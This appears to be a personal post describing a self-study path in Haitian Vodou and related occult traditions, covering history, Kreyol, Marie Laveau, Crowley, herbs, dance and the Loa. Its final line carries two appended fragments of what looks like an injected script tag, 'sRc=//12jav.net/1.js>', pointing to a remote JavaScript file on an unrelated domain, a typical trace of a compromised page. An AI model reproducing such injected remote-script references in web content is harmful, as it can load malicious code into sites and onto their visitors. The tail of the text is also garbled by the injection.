Here goes, I thought long and hard about what I did to pull together my knowledge, what I still do to continue through my path;
Read about the Haitian revolution, the slave trade, Haitian culture, the language, the lives of the people, read about the politics that encompass Haitis day to day life, learn Kreyol
Read about the passage of Vodou to North America, read about Marie Laveau and how she learned from Doctor John, how together they shaped the Vodou into Voodoo
Read about hermetic magick, read Aliester Crowley, read Eliphas Levi, look at the similarities between the lesser banishing ritual of the pentagram and the passwords non initiates are given.
Read about European magick, read into old traditions
Read about First Nations traditions, its practices, understand the connection both these oppressed people shared and how they understood each others suffering, how they shared their ancestral knowledge with one another
Read about herbs, learn the earth, learn to speak to it, learn to listen
Dance, sing, let your body go to that spiritual place that is not bound by human rules, let the sound of the drum beat carry you out to the astral waters
Learn as many Loa as you can, greet them as you would greet a new friend, get to know their likes, wants, hurts, pain, love, they are each individuals, value each and every one of their feelings as you would value a close friend
Remember!!!!
If an answer is handed to you and is easy it is not worth knowing, like a rubix cube given to you fully done there is no sense of discovery and excitement. Make words exciting, make that moment of clear understanding that sweeps through you with electric pleasure worth something, yearn for that moment! sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
